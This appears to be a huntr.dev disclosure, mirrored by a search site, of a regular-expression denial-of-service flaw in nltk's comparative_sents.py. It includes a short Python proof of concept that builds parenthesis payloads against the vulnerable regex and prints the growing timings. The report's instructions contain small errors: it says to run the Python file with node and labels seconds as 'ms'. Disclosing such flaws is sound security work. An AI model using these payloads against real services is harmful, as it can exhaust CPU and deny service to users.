Lucene search

K
huntrSrikanthprathiD19AED43-75BC-4A03-91A0-4D0BB516BC32
HistorySep 19, 2021 - 7:26 p.m.

Inefficient Regular Expression Complexity in nltk/nltk

2021-09-1919:26:08
srikanthprathi
www.huntr.dev
7

0.001 Low

EPSS

Percentile

45.8%

✍️ Description

The nltk package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide as an input to the _read_comparison_block() function in the file “nltk/corpus/reader/comparative_sents.py” may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:
https://github.com/nltk/nltk/blob/d21646dbd547cdd02d0c60f8e23d1d28a9fd1266/nltk/corpus/reader/comparative_sents.py#L259
https://github.com/nltk/nltk/blob/d21646dbd547cdd02d0c60f8e23d1d28a9fd1266/nltk/corpus/reader/comparative_sents.py#L48

Put the below in a poc.py file and run with node

import time
import re

evil_regex = re.compile(r"\((?!.*\()(.*)\)$")

for i in range(1, 50000):
    start_time = time.perf_counter()
    payload = "( "+"("*(i*40000)+""
    re.findall(evil_regex, payload)
    stop_time = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")

Check the Output:

Payload.length: 40002: 0.2007029 ms
Payload.length: 80002: 0.8401304 ms
Payload.length: 120002: 1.8615463 ms
Payload.length: 160002: 3.2876105 ms

0.001 Low

EPSS

Percentile

45.8%